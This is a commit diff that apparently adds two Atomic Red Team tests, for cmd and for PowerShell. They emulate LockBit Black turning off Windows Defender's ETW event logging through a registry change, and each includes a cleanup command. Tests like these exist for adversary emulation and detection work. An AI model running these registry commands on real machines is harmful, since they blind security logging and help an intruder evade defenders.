T1562.006-update (#2066)
Co-authored-by: anupama ramesh <aramesh@nti.local> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
arames13
@@ -129,3 +129,29 @@ atomic_tests:
|
||||
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
|
||||
description: |
|
||||
An adversary can disable the ETW Provider of Windows Defender,
|
||||
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /t REG_DWORD /d 0 /f
|
||||
cleanup_command: |
|
||||
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
|
||||
description: |
|
||||
An adversary can disable the ETW Provider of Windows Defender,
|
||||
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -PropertyType DWord -Value 0 -Force
|
||||
cleanup_command: |
|
||||
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
Reference in New Issue
Block a user